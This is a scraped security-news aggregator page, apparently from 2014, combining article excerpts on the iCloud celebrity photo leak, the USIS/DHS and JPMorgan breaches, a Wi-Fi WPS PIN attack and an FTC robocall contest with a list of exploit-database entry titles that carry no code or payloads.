What Jennifer Lawrence can teach you about cloud security

By now, you already have probably heard about the digital exposure, so to speak, of nude photos of as many as 100 celebrities, taken from their Apple iCloud backups and posted to the “b” forum on 4Chan. Over the last day, an alleged perpetrator has been exposed by redditors, although the man has declared his innocence  The main stream media have leapt on the story and gotten reactions from the affected celebrities, who include Oscar winner Jennifer Lawrence, model Kate Upton, and a number of other young actresses.

Someone claiming to be the individual responsible for the breach has used 4Chan to offer explicit videos from Lawrence’s phone, as well as more than 60 more nude “selfies” of the actress. In fact, it seems multiple "b-tards" claimed access to the images, with one providing a Hotmail address associated with a PayPal account and another seeking contributions to a Bitcoin wallet. Word of the images launched a cascade of Google searches and set Twitter trending. As a result, 4Chan/b—the birthplace of Anonymous—has opened its characteristically hostile arms to a wave of curious onlookers hoping to catch a glimpse of their favorite starlets’ naked bodies. Happy Labor Day!

This breach is different from other recent celebrity "hacks" in that it used a near-zero-day vulnerability in an Apple cloud interface. Instead of using social engineering or some low-tech research to gain control of the victims' cloud accounts, the attacker basically bashed in the front door—and Apple didn't find out until the attack was over. While an unusual, long, convoluted password may have prevented the attack from being successful, the only real defense against this assault was never to put photos in Apple's cloud in the first place. Even Apple's two factor authentication would not have helped.

Read 10 remaining paragraphs | Comments

[web applications] – Facebook – Logout your friends Vulnerability

[web applications] – WordPress FR0_theme theme Arbitrary File Download Vulnerability

[web applications] – WordPress acento theme Arbitrary File Download Vulnerability

[web applications] – WordPress lote27 theme Arbitrary File Download Vulnerability

[web applications] – WordPress NativeChurch theme Arbitrary File Download Vulnerability

[web applications] – WordPress Slideshow Gallery Plugin 1.4.6 – Shell Upload Vulnerability

[web applications] – Arachni Web Application Scanner Web UI – Stored XSS Vulnerability

[web applications] – WordPress CuckooTap Theme & eShop Arbitrary File Download

[web applications] – ManageEngine Desktop Central – Arbitrary File Upload / RCE Vulnerabilities

[web applications] – ManageEngine EventLog Analyzer Multiple Vulnerabilities

Jennifer Lawrence, Rihanna, 98 other celebs’ nude photos leaked online

The anonymous hacker reportedly gained access to the private photos of actress Jennifer Lawrence, as well as images of 99 other celebrities, allegedly via Apple's iCloud storage system.

[webapps] – Arachni Web Application Scanner Web UI – Stored XSS Vulnerability

Arachni Web Application Scanner Web UI - Stored XSS Vulnerability

[papers] – Outsmarted – Why Malware Works in face of Antivirus Software

Outsmarted - Why Malware Works in face of Antivirus Software

[webapps] – ManageEngine EventLog Analyzer Multiple Vulnerabilities

ManageEngine EventLog Analyzer Multiple Vulnerabilities

[webapps] – WordPress Slideshow Gallery Plugin 1.4.6 – Shell Upload Vulnerability

WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability

[webapps] – Mulitple WordPress Themes (admin-ajax.php, img param) – Arbitrary File Download

Mulitple WordPress Themes (admin-ajax.php, img param) - Arbitrary File Download

[remote exploits] – NRPE 2.15 – Remote Code Execution Vulnerability

[remote exploits] – Wing FTP Server Authenticated Command Execution Exploit

[local exploits] – HTML Help Workshop 1.4 – (SEH) Buffer Overflow

Hackers stole security check info on at least 25,000 DHS employees

Employees at the Department of Homeland Security may be feeling a bit less secure about their personal data.

On August 2, Department of Homeland Security officials revealed that the agency's contractor for conducting security clearance background checks had been hacked, and an unknown number of DHS employees' personal data from those investigations had been stolen—potentially by a state-sponsored hacker. Now the DHS has a handle on how many records were stolen from the firm, the Falls Church, Virginia firm USIS: at least 25,000.

The Associated Press cites information from an unnamed DHS official, who spoke with the service under the condition of anonymity. "Homeland Security will soon begin notifying employees whose files were compromised and urge them to monitor their financial accounts," the Associated Press' Joce Sterman reported.

USIS is, as the Washington Post reported, the largest contract provider of background investigations to the federal government. The attack on USIS comes after the March revelation that the US Office of Personnel Management had been attacked by hackers based in China, potentially giving them access to the personal information of millions of government employees—though OPM offficials say that no personal data appeared to have been taken in the attack before it was detected.

Read 2 remaining paragraphs | Comments

Offline attack shows Wi-Fi routers still vulnerable

A researcher has refined an attack on wireless routers with poorly implemented versions of the Wi-Fi Protected Setup that allows someone to quickly gain access to a router's network.

The attack exploits weak randomization, or the lack of randomization, in a key used to authenticate hardware PINs on some implementations of Wi-Fi Protected Setup, allowing anyone to quickly collect enough information to guess the PIN using offline calculations. By calculating the correct PIN, rather than attempting to brute-force guess the numerical password, the new attack circumvents defenses instituted by companies.

While previous attacks require up to 11,000 guesses—a relatively small number—and approximately four hours to find the correct PIN to access the router's WPS functionality, the new attack only requires a single guess and a series of offline calculations, according to Dominique Bongard, reverse engineer and founder of 0xcite, a Swiss security firm.

Read 8 remaining paragraphs | Comments

The long game: How hackers spent months pulling bank data from JPMorgan

JPMorgan Chase CEO Jamie Dimon said attacks were "going to be non-stop." It looks like he was right.

The electronic attack on JPMorgan Chase’s network, now under investigation by federal law enforcement, apparently spanned months, according to a report by Bloomberg News. Starting in June, hackers used multiple custom-crafted bits of malware to infiltrate the bank’s infrastructure and slowly shipped bits of bank transaction data back out through computers in several countries before it was sent onward to Russia.

The attack, which went on for more than two months before being detected by JPMorgan in a security scan, bears the fingerprints of similar long-game attacks against corporate targets by cybercriminals from Eastern Europe, some of whom have developed capabilities more advanced than state-sponsored hackers. While the details obtained by Bloomberg’s Jordan Robertson and Michael Riley are sparse, the information provided by their sources is consistent with attacks on a number of European banks earlier this year.

While the FBI and National Security Agency are reportedly investigating whether the attack came from Russian state-sponsored hackers—or at least state-sanctioned ones—in retaliation for sanctions against Russia, making that connection will be difficult at best. It seems more likely, based on recent security reports, that the attacks were criminal in nature—but relied on tools and techniques that may have a mixed provenance, using methods honed in attacks on other banks and on government targets for financial gain.

Read 8 remaining paragraphs | Comments

Racing Post let off with stern warning after data breach

The Racing Post, which suffered a data breach affecting over 677,000 users late last year, has been slacking off on its security arrangements since at least 2007. It's been given until the end of February 2015 to get its house in order.

[remote] – NRPE 2.15 – Remote Code Execution Vulnerability

NRPE 2.15 - Remote Code Execution Vulnerability

FTC picks winners in latest robocall-defeating contest, scammers keep scamming

On Thursday the Federal Trade Commission (FTC) announced the winners of a robocall-defeating contest that the commission held at DefCon in early August. Three groups of contestants each won $3,133.70 and two runners-up each won $1,337 (for being just that elite). The FTC says it receives 150,000 robocall complaints each month, down from 200,000 per month one year ago.

The contest was called “Zapping Rachel,” for the well-known scam in which a pre-recorded woman's voice tells an unsuspecting phone answerer, “Hi this is Rachel at cardholder services." The FTC separated the contestants into Creator, Attacker, and Detective categories—Creator entrants were asked to build a honeypot to lure robocallers, Detective entrants were given the honeypot data and asked to analyze it, and Attacker entrants were tasked with finding honeypot vulnerabilities. Contestants were given between 24 and 48 hours to submit their entries, depending on the category they entered.

For the Creator category, Jon Olawski, who is a Software Engineering Director for an Internet marketing company by day, won the prize. He built a honeypot that used “an audio captcha filter, call detail analysis, and recording and transcription analysis” to automatically rate an incoming call as to whether it came from a robocaller or not. In an e-mail to Ars, Olawski described his idea as “a 10-point 'strike' system,” and if a caller hits a certain number of strikes, that number is known to be a robocaller and can be placed on a blacklist.

Read 10 remaining paragraphs | Comments

[web applications] – XRMS – Blind SQL Injection and Command Execution Exploit

[web applications] – ManageEngine DeviceExpert 5.9 – User Credential Disclosure

[web applications] – PhpWiki – Remote Command Execution Exploit

[web applications] – Plogger 1.0-RC1 – Authenticated Arbitrary File Upload Exploit

[remote exploits] – Firefox WebIDL Privileged Javascript Injection Exploit

[web applications] – WordPress ShortCode Plugin 1.1 – Local File Inclusion Vulnerability

[web applications] – ActualAnalyzer Lite 2.81 – Unauthenticated Command Execution Exploit

Feds Investigating Breaches At JPMorgan, Other Banks

JPMorgan working with FBI, US Secret Service to determine scope of breach, but other newly reported intrusions at financial firms may not be related.

Feds Investigating Breaches At JP Morgan, Other Banks

JP Morgan working with FBI, US Secret Service to determine scope of breach, but other newly reported intrusions at financial firms may not be related.